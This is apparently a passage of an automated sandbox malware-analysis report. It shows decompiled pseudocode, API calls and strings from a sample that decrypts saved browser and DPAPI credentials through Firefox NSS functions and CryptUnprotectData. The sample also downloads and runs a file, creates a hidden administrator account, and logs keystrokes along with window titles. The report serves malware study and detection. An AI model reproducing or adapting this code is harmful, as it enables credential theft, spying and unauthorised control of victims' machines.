							_t31 =  &(_t31[0]);
						} while (_t39 < _t36);
					}
					_push( &_v8216);
				}
				return lstrcpyW(_t29, ??);
			}

0x00409150
0x00409158
0x00409160
0x00409163
0x00409165
0x00409168
0x00409176
0x00409178
0x0040917b
0x0040917d
0x00409180
0x00409183
0x00409187
0x00409188
0x00409180
0x0040918c
0x0040918f
0x00409192
0x00409195
0x004091a0
0x004091a4
0x004091ac
0x004091d5
0x004091ae
0x004091b0
0x004091b2
0x004091b5
0x004091bb
0x004091bb
0x004091bf
0x004091c2
0x004091c5
0x004091c8
0x004091bb
0x004091d2
0x004091d2
0x004091e5

APIs

GlobalAlloc.KERNEL32(00000040,-00000001,756645FD,?,?,?,00409104,00001000,?,00000000,00001000), ref: 0040916E
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00409104), ref: 004091A4
lstrcpyW.KERNEL32(?,Could not decrypt), ref: 004091DB

Strings

Could not decrypt, xrefs: 004091D5

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: AllocCryptDataGlobalUnprotectlstrcpy
String ID: Could not decrypt
API String ID: 3112367126-1484008118
Opcode ID: fc0f622c9fb2ff7c4ec637993297f3bc9bb7a08dc3c8dd8d8f8921ad52fb0c66
Instruction ID: 1abc3db474fe3b319ddae7689be19c513d00d763e18794f27d19184647c918fc
Opcode Fuzzy Hash: fc0f622c9fb2ff7c4ec637993297f3bc9bb7a08dc3c8dd8d8f8921ad52fb0c66
Instruction Fuzzy Hash: 8C110672A0021AABD711CB98C9449DEF7BCEF88700B10417AEA45F7292E2749E01CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 0040D2C9 Relevance: 6.1, APIs: 4, Instructions: 63
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D2C9(void* __ecx, void* __eflags) {
				void* _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				long _v20;
				long _v24;
				union _SID_NAME_USE _v28;
				short _v60;
				short _v580;
				void* _t37;

				_v20 = 0x10;
				_v8 = 0;
				_t37 = __ecx;
				_v16.Value = 0;
				_v12 = 0x500;
				E00401052( &_v580, 0, 0x208);
				_v24 = 0x104;
				if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v8) == 0 || LookupAccountSidW(0, _v8,  &_v580,  &_v24,  &_v60,  &_v20,  &_v28) == 0) {
					GetLastError();
				}
				if(_v8 != 0) {
					FreeSid(_v8);
				}
				E004033AB(_t37,  &_v580);
				return _t37;
			}

0x0040d2d6
0x0040d2e8
0x0040d2ed
0x0040d2ef
0x0040d2f2
0x0040d2f8
0x0040d300
0x0040d326
0x0040d34d
0x0040d34d
0x0040d356
0x0040d35b
0x0040d35b
0x0040d36a
0x0040d374

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0040B5B6,?,?,00000001), ref: 0040D31E
LookupAccountSidW.ADVAPI32(00000000,0040B5B6,?,00000104,?,00000010,?), ref: 0040D343
GetLastError.KERNEL32(?,?,00000001), ref: 0040D34D
FreeSid.ADVAPI32(0040B5B6,?,?,00000001), ref: 0040D35B

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: AccountAllocateErrorFreeInitializeLastLookup
String ID:
API String ID: 1866703397-0
Opcode ID: 7ead7305882b7dc886f07fa9173832ee46511fb401dc2f31b7fe3a49917cc7bb
Instruction ID: 334ab5876d2aba259553a6502469595c618b91c65a01fb44ce39d128aa09844e
Opcode Fuzzy Hash: 7ead7305882b7dc886f07fa9173832ee46511fb401dc2f31b7fe3a49917cc7bb
Instruction Fuzzy Hash: 9811CBB190021DABDB10DFD1DD89AEFBBBCEB08344F10417AE605E2190D7749B489BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040D450 Relevance: 6.1, APIs: 4, Instructions: 54
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D450(WCHAR** __ecx, intOrPtr* __edx) {
				struct HRSRC__* _t13;
				void* _t14;
				unsigned int _t32;
				intOrPtr* _t35;
				struct HINSTANCE__* _t36;

				_t35 = __edx;
				_t36 = LoadLibraryExW( *__ecx, 0, 2);
				if(_t36 == 0xffffffff) {
					L4:
					return 0;
				}
				_t13 = FindResourceW(_t36, 1, 0x10);
				if(_t13 == 0) {
					goto L4;
				}
				_t14 = LoadResource(_t36, _t13);
				if(_t14 == 0) {
					goto L4;
				}
				_t32 =  *(_t14 + 0x28);
				 *_t35 =  *((intOrPtr*)(_t14 + 0x14));
				 *((short*)(_t35 + 4)) =  *((intOrPtr*)(_t14 + 0x1a));
				 *((short*)(_t35 + 6)) =  *((intOrPtr*)(_t14 + 0x18));
				 *(_t35 + 8) = _t32 & 1;
				 *(_t35 + 0xc) = _t32 >> 0x00000001 & 1;
				 *(_t35 + 0x10) = _t32 >> 0x00000003 & 1;
				 *(_t35 + 0x14) = _t32 >> 0x00000005 & 1;
				FreeLibrary(_t36);
				return 1;
			}

0x0040d459
0x0040d461
0x0040d466
0x0040d4ca
0x00000000
0x0040d4ca
0x0040d46f
0x0040d477
0x00000000
0x00000000
0x0040d47b
0x0040d483
0x00000000
0x00000000
0x0040d488
0x0040d48b
0x0040d491
0x0040d49d
0x0040d4a1
0x0040d4b6
0x0040d4ba
0x0040d4bd
0x0040d4c0
0x00000000

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,?,0040BDEF), ref: 0040D45B
FindResourceW.KERNEL32(00000000,00000001,00000010,?,00000000,00000002,?,?,?,0040BDEF), ref: 0040D46F
LoadResource.KERNEL32(00000000,00000000,?,00000000,00000002,?,?,?,0040BDEF), ref: 0040D47B
FreeLibrary.KERNEL32(00000000,?,00000000,00000002,?,?,?,0040BDEF), ref: 0040D4C0

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: LibraryLoadResource$FindFree
String ID:
API String ID: 3272429154-0
Opcode ID: 5d15f8974ed7cc1a5e341c81c565cad18f7e7614c1fcc42718d7a568df6e1744
Instruction ID: e6de038d9c85ff7a3f0a57d6dbaf571f5244e1517d455b0afe1d62e5f2af1bb9
Opcode Fuzzy Hash: 5d15f8974ed7cc1a5e341c81c565cad18f7e7614c1fcc42718d7a568df6e1744
Instruction Fuzzy Hash: 9101D2B1710A02AFD3088F65DC85AA6B7A4FF48310714C339EA19C33E0D774D815C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 0040264B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040264B(void* __ecx, void* __eflags, signed int _a4) {
				short* _v12;
				void* _v16;
				char _v20;
				void* _t26;
				void* _t36;
				void* _t38;
				void* _t42;
				void* _t58;
				void* _t59;

				_t66 = __eflags;
				_t42 = __ecx;
				_t58 = 0x1a;
				E0040D51C( &_v12, _t58, __eflags);
				_t59 = 0xa;
				_t26 = E0040326D( &_v16, _t59, __eflags);
				E004030FB(E00403230( &_v12, _t59, _t66, "\\"), _t66, _t26);
				E004058FB(_v16);
				_t61 = _a4 + 4;
				E004033F3( &_v16, _a4 + 4);
				E004030FB( &_v12, _t66, E004032E3( &_v16,  &_a4));
				E004058FB(_a4);
				_a4 = _a4 & 0x00000000;
				E004058FB(_v16);
				_t36 = E004033F3( &_a4, _t61);
				__imp__URLDownloadToFileW(0, _a4, _v12, 0, 0);
				E004058FB(_a4);
				if(_t36 == 0) {
					_t38 = ShellExecuteW(0, L"open", _v12, 0, 0, 5);
					_v16 = 2;
					__eflags = _t38 - 0x20;
					if(_t38 > 0x20) {
						_v16 = 0;
					}
				} else {
					_v16 = 1;
				}
				_v20 = 0x4125a4;
				E00404A3D(_t42,  &_v20);
				return E004058FB(_v12);
			}

0x0040264b
0x00402654
0x0040265b
0x0040265c
0x00402663
0x00402667
0x0040267e
0x00402686
0x00402691
0x00402695
0x004026aa
0x004026b2
0x004026ba
0x004026be
0x004026ca
0x004026d8
0x004026e3
0x004026ea
0x00402702
0x00402708
0x0040270f
0x00402712
0x00402714
0x00402714
0x004026ec
0x004026ec
0x004026ec
0x0040271a
0x00402724
0x00402735

APIs

Part of subcall function 0040D51C: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0040D54D

Part of subcall function 004030FB: lstrcatW.KERNEL32 ref: 0040312B

Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903

Part of subcall function 004033F3: lstrcpyW.KERNEL32(00000000,?), ref: 0040341D

Part of subcall function 004032E3: PathFindExtensionW.SHLWAPI(?), ref: 004032ED

URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 004026D8
ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00402702

Strings

open, xrefs: 004026FC

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Path$DownloadExecuteExtensionFileFindFolderFreeShellSpecialVirtuallstrcatlstrcpy
String ID: open
API String ID: 4166385161-2758837156
Opcode ID: 32b418ae1fee956fca46b7227a99302008e1dc8d90f7d94feb650825211c3c04
Instruction ID: 7d18c0bc51ad2404c9d7291eac21bd67f322441bd230aa74e5acf51f38df913e
Opcode Fuzzy Hash: 32b418ae1fee956fca46b7227a99302008e1dc8d90f7d94feb650825211c3c04
Instruction Fuzzy Hash: 44214136A00208BBCB14AFA5C986DEE7B78EF85719F00806EF816771C1DB785A45DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00409C70 Relevance: 4.6, APIs: 3, Instructions: 61
stringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00409C70(void* __ecx, void* __eflags, CHAR* _a4, CHAR** _a8) {
				int _v8;
				DWORD* _v12;
				DWORD* _v16;
				void* _v20;
				int _v24;
				BYTE* _v28;
				char _v32;
				char _v8128;
				int _t27;
				CHAR* _t39;
				void* _t43;

				_t43 = __ecx;
				E00401130(0x1fbc, __ecx);
				_v8 = 0x1fa0;
				_t27 = lstrlenA(_a4);
				E00401052( &_v8128, 0, 0x1fa0);
				CryptStringToBinaryA(_a4, _t27, 1,  &_v8128,  &_v8, 0, 0);
				_v32 = 0;
				_v28 =  &_v8128;
				_v24 = _v8;
				_v16 = 0;
				_v12 = 0;
				_v20 = 0;
				 *((intOrPtr*)(_t43 + 0x68))( &_v32,  &_v20, 0);
				 *((char*)(_v12 + _v16)) = 0;
				_t39 = E0040590A(_v12 + 1);
				 *_a8 = _t39;
				return lstrcpyA(_t39, _v16);
			}

0x00409c70
0x00409c78
0x00409c8a
0x00409c8d
0x00409ca0
0x00409cbb
0x00409cc7
0x00409cca
0x00409cd0
0x00409cdb
0x00409cdf
0x00409ce2
0x00409ce5
0x00409cf1
0x00409cfa
0x00409d06
0x00409d12

APIs

lstrlenA.KERNEL32(?,?,?,00000000,?,00409566,?,?,?,?,?,encryptedUsername,?,?,00000000,C0000000), ref: 00409C8D
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 00409CBB

Part of subcall function 0040590A: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00403418,?,?,?,0040EE0E,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00405914

lstrcpyA.KERNEL32(00000000,?), ref: 00409D08

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: AllocBinaryCryptStringVirtuallstrcpylstrlen
String ID:
API String ID: 573875632-0
Opcode ID: 13de05a77557a64dc6a0c0ece0edb854a0c133b5ba4a5673c8a0fc1e9c5872d1
Instruction ID: 7f984b37708a3500988b97faece6023182ea8004ba806bbf7cf8fbeaa28c1260
Opcode Fuzzy Hash: 13de05a77557a64dc6a0c0ece0edb854a0c133b5ba4a5673c8a0fc1e9c5872d1
Instruction Fuzzy Hash: 7611D6B690020DAFCB00DF95D8848EEBBB8EB08344F10817AF909E3251D7759A45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040B55D Relevance: 3.1, APIs: 2, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040B55D(char _a4, char _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v32;
				void _v36;
				void* _t22;
				intOrPtr* _t25;
				signed int _t30;
				intOrPtr* _t38;

				_t38 = _a4;
				_t30 = 8;
				memset( &_v36, 0, _t30 << 2);
				_v36 =  *_t38;
				_v24 = 1;
				_v20 = 0;
				_v32 =  *_a8;
				_t22 =  &_v36;
				_v16 = 0;
				_v12 = 0x10201;
				_v8 = 0;
				__imp__NetUserAdd(0, 1, _t22, 0);
				_t42 = _t22;
				if(_t22 != 0) {
					L3:
					__eflags = 0;
					return 0;
				}
				_a4 =  *_t38;
				_t25 = E0040D2C9( &_a8, _t42);
				__imp__NetLocalGroupAddMembers(0,  *_t25, 3,  &_a4, 1);
				E004058FB(_a8);
				if(_t25 != 0) {
					goto L3;
				}
				return 1;
			}

0x0040b565
0x0040b56d
0x0040b573
0x0040b579
0x0040b581
0x0040b584
0x0040b589
0x0040b58c
0x0040b592
0x0040b595
0x0040b59c
0x0040b59f
0x0040b5a5
0x0040b5a7
0x0040b5d8
0x0040b5d8
0x00000000
0x0040b5d8
0x0040b5ae
0x0040b5b1
0x0040b5c0
0x0040b5cb
0x0040b5d2
0x00000000
0x00000000
0x00000000

APIs

NetUserAdd.NETAPI32(00000000,00000001,?,00000000,?,00000000,00417D24,?,?,?,0040C67C,00417D20,00417D24), ref: 0040B59F

Part of subcall function 0040D2C9: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0040B5B6,?,?,00000001), ref: 0040D31E
Part of subcall function 0040D2C9: LookupAccountSidW.ADVAPI32(00000000,0040B5B6,?,00000104,?,00000010,?), ref: 0040D343
Part of subcall function 0040D2C9: GetLastError.KERNEL32(?,?,00000001), ref: 0040D34D
Part of subcall function 0040D2C9: FreeSid.ADVAPI32(0040B5B6,?,?,00000001), ref: 0040D35B

NetLocalGroupAddMembers.NETAPI32(00000000,00000000,00000003,00010201,00000001,?,?,?,0040C67C,00417D20,00417D24), ref: 0040B5C0

Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Free$AccountAllocateErrorGroupInitializeLastLocalLookupMembersUserVirtual
String ID:
API String ID: 188019324-0
Opcode ID: 0d77d6f1052675918caacd119e161bd4e254674f2e264095daca47873fb553a0
Instruction ID: b0798810341bc1557ea5804e67944a3c553e3cd416051ae7d3b6402d41834199
Opcode Fuzzy Hash: 0d77d6f1052675918caacd119e161bd4e254674f2e264095daca47873fb553a0
Instruction Fuzzy Hash: 4D112E76A00208AFDB11DFA9C8848EEF7F8FF59314B00856BF951F7250D7B49A048B94

Uniqueness

Uniqueness Score: -1.00%

Function 0040A190 Relevance: 47.5, APIs: 10, Strings: 17, Instructions: 219
libraryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040A190(void* __ecx, void* __edx, WCHAR* _a4) {
				WCHAR* _v8;
				long _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				char _v24;
				char _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				short _v560;
				struct HINSTANCE__* _t135;
				WCHAR* _t158;
				intOrPtr _t194;
				void* _t206;
				void* _t216;
				void* _t218;

				_t206 = __edx;
				_t158 = 0;
				_t216 = __ecx;
				E00401052( &_v560, 0, 0x104);
				GetCurrentDirectoryW(0x104,  &_v560);
				SetCurrentDirectoryW(_a4);
				E00403230( &_a4, _t206, 0, "\\");
				E004033F3( &_v40,  &_a4);
				E00403230( &_v40, _t206, 0, L"nss3.dll");
				E004033F3( &_v20,  &_a4);
				E00403230( &_v20, _t206, 0, L"msvcr120.dll");
				E004033F3( &_v16,  &_a4);
				E00403230( &_v16, _t206, 0, L"msvcp120.dll");
				E004033F3( &_v36,  &_a4);
				E00403230( &_v36, _t206, 0, L"mozglue.dll");
				E004033F3( &_v32,  &_a4);
				E00403230( &_v32, _t206, 0, L"softokn3.dll");
				E004033F3( &_v28,  &_a4);
				E00403230( &_v28, _t206, 0, L"msvcp");
				E004033F3( &_v24,  &_a4);
				E00403230( &_v24, _t206, 0, L"msvcr");
				_t218 = 0x5a;
				_v12 = 0x104;
				while(1) {
					E004033F3( &_v8,  &_v28);
					E00403230(E00403038( &_v8, _t206, 0, _v12), _t206, 0, L".dll");
					if(PathFileExistsW(_v8) != 0) {
						break;
					}
					_v12 = _v12 + 0xa;
					E004058FB(_v8);
					_t224 = _v12 - 0x96;
					_v8 = _t158;
					if(_v12 != 0x96) {
						continue;
					} else {
						while(1) {
							L5:
							E004033F3( &_v8,  &_v24);
							E00403230(E00403038( &_v8, _t206, _t224, _t218), _t206, _t224, L".dll");
							if(PathFileExistsW(_v8) != 0) {
								break;
							}
							_t218 = _t218 + 0xa;
							E004058FB(_v8);
							_v8 = _t158;
							if(_t218 != 0x96) {
								continue;
							}
							L9:
							 *((intOrPtr*)(_t216 + 0xa0)) = LoadLibraryW(_v20);
							 *((intOrPtr*)(_t216 + 0xa4)) = LoadLibraryW(_v16);
							 *((intOrPtr*)(_t216 + 0xa8)) = LoadLibraryW(_v36);
							 *((intOrPtr*)(_t216 + 0xac)) = LoadLibraryW(_v40);
							_t135 = LoadLibraryW(_v32);
							 *(_t216 + 0xb0) = _t135;
							if( *((intOrPtr*)(_t216 + 0xa4)) != _t158 &&  *((intOrPtr*)(_t216 + 0xa8)) != _t158) {
								_t194 =  *((intOrPtr*)(_t216 + 0xac));
								if(_t194 != 0) {
									_t230 = _t135;
									if(_t135 != 0) {
										_push(_t194);
										 *((intOrPtr*)(_t216 + 0x60)) = E0040E579(_t194, "NSS_Init", _t230);
										 *((intOrPtr*)(_t216 + 0x78)) = E0040E579( *((intOrPtr*)(_t216 + 0xac)), "PK11_GetInternalKeySlot", _t230);
										 *((intOrPtr*)(_t216 + 0x74)) = E0040E579( *((intOrPtr*)(_t216 + 0xac)), "PK11_Authenticate", _t230);
										 *((intOrPtr*)(_t216 + 0x68)) = E0040E579( *((intOrPtr*)(_t216 + 0xac)), "PK11SDR_Decrypt", _t230);
										 *((intOrPtr*)(_t216 + 0x6c)) = E0040E579( *((intOrPtr*)(_t216 + 0xac)), "NSSBase64_DecodeBuffer", _t230);
										 *((intOrPtr*)(_t216 + 0x70)) = E0040E579( *((intOrPtr*)(_t216 + 0xac)), "PK11_CheckUserPassword", _t230);
										 *((intOrPtr*)(_t216 + 0x64)) = E0040E579( *((intOrPtr*)(_t216 + 0xac)), "NSS_Shutdown", _t230);
										 *((intOrPtr*)(_t216 + 0x7c)) = E0040E579( *((intOrPtr*)(_t216 + 0xac)), "PK11_FreeSlot", _t230);
										 *((intOrPtr*)(_t216 + 0x80)) = E0040E579( *((intOrPtr*)(_t216 + 0xac)), "PR_GetError", _t230);
										SetCurrentDirectoryW( &_v560);
										_t158 = 1;
									}
								}
							}
							E004058FB(_v24);
							E004058FB(_v28);
							E004058FB(_v32);
							E004058FB(_v36);
							E004058FB(_v16);
							E004058FB(_v20);
							E004058FB(_v40);
							E004058FB(_a4);
							return _t158;
						}
						E004031FD( &_v20,  &_v8);
						E004058FB(_v8);
						goto L9;
					}
				}
				E004031FD( &_v16,  &_v8);
				E004058FB(_v8);
				goto L5;
			}

0x0040a190
0x0040a1a8
0x0040a1aa
0x0040a1ae
0x0040a1be
0x0040a1c7
0x0040a1d5
0x0040a1e1
0x0040a1ee
0x0040a1fa
0x0040a207
0x0040a213
0x0040a220
0x0040a22c
0x0040a239
0x0040a245
0x0040a252
0x0040a25e
0x0040a26b
0x0040a277
0x0040a284
0x0040a28b
0x0040a28c
0x0040a28f
0x0040a296
0x0040a2ad
0x0040a2bd
0x00000000
0x00000000
0x0040a2c2
0x0040a2c6
0x0040a2cb
0x0040a2d2
0x0040a2d5
0x00000000
0x0040a2d7
0x0040a2ed
0x0040a2ed
0x0040a2f4
0x0040a309
0x0040a319
0x00000000
0x00000000
0x0040a31e
0x0040a321
0x0040a326
0x0040a32f
0x00000000
0x00000000
0x0040a347
0x0040a355
0x0040a360
0x0040a36b
0x0040a376
0x0040a37c
0x0040a37e
0x0040a38a
0x0040a39c
0x0040a3a4
0x0040a3aa
0x0040a3ac
0x0040a3b2
0x0040a3c8
0x0040a3db
0x0040a3ee
0x0040a401
0x0040a414
0x0040a427
0x0040a43a
0x0040a44d
0x0040a455
0x0040a463
0x0040a46b
0x0040a46b
0x0040a3ac
0x0040a3a4
0x0040a46f
0x0040a477
0x0040a47f
0x0040a487
0x0040a48f
0x0040a497
0x0040a49f
0x0040a4a7
0x0040a4b2
0x0040a4b2
0x0040a33a
0x0040a342
0x00000000
0x0040a342
0x0040a2d5
0x0040a2e0
0x0040a2e8
0x00000000

APIs

GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0040A1BE
SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040A1C7

Part of subcall function 004033F3: lstrcpyW.KERNEL32(00000000,?), ref: 0040341D

Part of subcall function 00403038: wsprintfW.USER32 ref: 00403053

PathFileExistsW.SHLWAPI(0040927E), ref: 0040A2B5
PathFileExistsW.SHLWAPI(0040927E), ref: 0040A311
LoadLibraryW.KERNEL32(?,0040927E,?,00000104,00000000), ref: 0040A350
LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040A35B
LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040A366
LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040A371
LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040A37C
SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040A463

Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903

Strings

NSSBase64_DecodeBuffer, xrefs: 0040A3FC
PK11_Authenticate, xrefs: 0040A3D6
msvcr, xrefs: 0040A27C
msvcr120.dll, xrefs: 0040A1FF
PR_GetError, xrefs: 0040A448
PK11_CheckUserPassword, xrefs: 0040A40F
msvcp, xrefs: 0040A263
msvcp120.dll, xrefs: 0040A218
NSS_Shutdown, xrefs: 0040A422
NSS_Init, xrefs: 0040A3B3
PK11_GetInternalKeySlot, xrefs: 0040A3C3
softokn3.dll, xrefs: 0040A24A
.dll, xrefs: 0040A29B, 0040A2F9
mozglue.dll, xrefs: 0040A231
nss3.dll, xrefs: 0040A1E6
PK11SDR_Decrypt, xrefs: 0040A3E9
PK11_FreeSlot, xrefs: 0040A435

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: LibraryLoad$CurrentDirectory$ExistsFilePath$FreeVirtuallstrcpywsprintf
String ID: .dll$NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$PR_GetError$mozglue.dll$msvcp$msvcp120.dll$msvcr$msvcr120.dll$nss3.dll$softokn3.dll
API String ID: 410702425-850564384
Opcode ID: 03cc6d500c5ef4627c6173b8503942e9184efd6205174026926cbcde03ab17df
Instruction ID: a84aad35f4fb42e2e59513eaa3ff0b1b9c8996ec607a67ff7e911fe5e49831e7
Opcode Fuzzy Hash: 03cc6d500c5ef4627c6173b8503942e9184efd6205174026926cbcde03ab17df
Instruction Fuzzy Hash: C3913E31A00609EBCB04EFA1D9829DEBB78FF44305F10817FA446B7191DF786A64DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00407B2E Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 277
registrystringwindowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00407B2E(void* __ecx, void* __eflags, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				char _v524;
				short _v564;
				intOrPtr _v568;
				short _v570;
				short _v572;
				long _v596;
				char _v600;
				int _v604;
				char _v612;
				intOrPtr _v616;
				struct _OVERLAPPED* _v620;
				char _v624;
				char _v628;
				void* _v632;
				char _v636;
				intOrPtr _v640;
				struct _OVERLAPPED* _v644;
				char _v648;
				void* _t76;
				short _t77;
				void* _t82;
				char* _t84;
				struct _OVERLAPPED** _t86;
				long _t88;
				intOrPtr _t93;
				intOrPtr* _t96;
				long _t100;
				intOrPtr _t101;
				WCHAR* _t102;
				intOrPtr _t104;
				void* _t105;
				long _t109;
				void* _t110;
				intOrPtr _t111;
				intOrPtr _t113;
				long _t116;
				intOrPtr _t117;
				intOrPtr _t119;
				long _t121;
				intOrPtr _t122;
				intOrPtr _t124;
				void* _t126;
				intOrPtr _t128;
				intOrPtr _t130;
				long _t132;
				intOrPtr _t133;
				intOrPtr _t135;
				DWORD* _t136;
				long _t137;
				intOrPtr _t138;
				long _t142;
				void* _t152;
				long _t164;
				intOrPtr _t178;
				intOrPtr _t189;
				void* _t195;
				struct _OVERLAPPED* _t198;
				struct _OVERLAPPED* _t201;
				void* _t204;
				void* _t206;
				void* _t208;
				signed int _t209;
				void* _t212;
				void* _t213;

				_t198 = 0;
				_v600 = 0;
				E00401052( &_v524, 0, 0x208);
				_t212 = (_t209 & 0xfffffff8) - 0x25c + 0xc;
				_t201 = 0;
				_v604 = 0;
				_t76 = _a8 - 1;
				if(_t76 == 0) {
					_t77 = 6;
					_v570 = _t77;
					__eflags = 1;
					_v564 = _a4;
					_v568 = 0x130;
					_v572 = 1;
					__imp__RegisterRawInputDevices( &_v572, 1, 0xc);
				} else {
					_t82 = _t76 - 0xf;
					if(_t82 == 0) {
						PostQuitMessage(0);
					} else {
						if(_t82 == 0xef) {
							_t84 =  &_v600;
							__imp__GetRawInputData(_a16, 0x10000003, 0, _t84, 0x10);
							__eflags = _t84 - 0xffffffff;
							if(_t84 != 0xffffffff) {
								_t164 = E004059A9(_v620);
								_v596 = _t164;
								__eflags = _t164;
								if(_t164 != 0) {
									_t86 =  &_v620;
									__imp__GetRawInputData(_a16, 0x10000003, _t164, _t86, 0x10);
									__eflags = _t86 - _v640;
									if(_t86 == _v640) {
										__eflags =  *((intOrPtr*)(_t164 + 0x18)) - 0x100;
										if( *((intOrPtr*)(_t164 + 0x18)) == 0x100) {
											_t88 = GetWindowTextW(GetForegroundWindow(),  &_v564, 0x104);
											__eflags = _t88;
											if(_t88 <= 0) {
												E004030C5( &_v644, _t195, L"Unknow");
											} else {
												E004031FD( &_v648, E004033AB( &_v636,  &_v564));
												E004058FB(_v644);
											}
											E00407FAE( &_v632,  *((intOrPtr*)(_t164 + 0x16)));
											E004031FD( &_v632,  &_v644);
											_t93 =  *0x4166ac; // 0x416d98
											E00403230( &_v624,  *((intOrPtr*)(_t164 + 0x16)), __eflags, _t93 + 0x10);
											_t96 =  *0x4166ac; // 0x416d98
											__eflags =  *_t96 - _t198;
											if( *_t96 != _t198) {
												_t213 = _t212 - 0x10;
												__eflags = _t96 + 0xa18;
												E00401301(_t213, _t96 + 0xa18, _t96 + 0xa18);
												_t208 = _t213 - 0x10;
												E004033F3(_t208,  &_v636);
												 *((intOrPtr*)(_t208 + 4)) = _v636;
												 *((short*)(_t208 + 8)) = _v632;
												E004033F3(_t208 + 0xc,  &_v628);
												_t152 = E004044F4( &_v612, __eflags);
												_t189 =  *0x4166ac; // 0x416d98
												_t36 = _t189 + 0xa50; // 0x18fcf8
												E00404A3D( *_t36, _t152);
												E004044CA( &_v648);
												_t96 =  *0x4166ac; // 0x416d98
											}
											__eflags =  *((intOrPtr*)(_t96 + 0xa14)) - _t198;
											if( *((intOrPtr*)(_t96 + 0xa14)) != _t198) {
												_t100 = lstrlenW(_t96 + 0x210);
												__eflags = _t100;
												_t101 =  *0x4166ac; // 0x416d98
												if(_t100 == 0) {
													L17:
													_t102 = _t101 + 0x210;
													__eflags = _t102;
													lstrcpyW(_t102, _v632);
													_t104 =  *0x4166ac; // 0x416d98
													 *(_t104 + 0xa10) = _t198;
												} else {
													_t142 = E0040300E( &_v648, E004033AB( &_v636, _t101 + 0x210));
													E004058FB(_v644);
													_t101 =  *0x4166ac; // 0x416d98
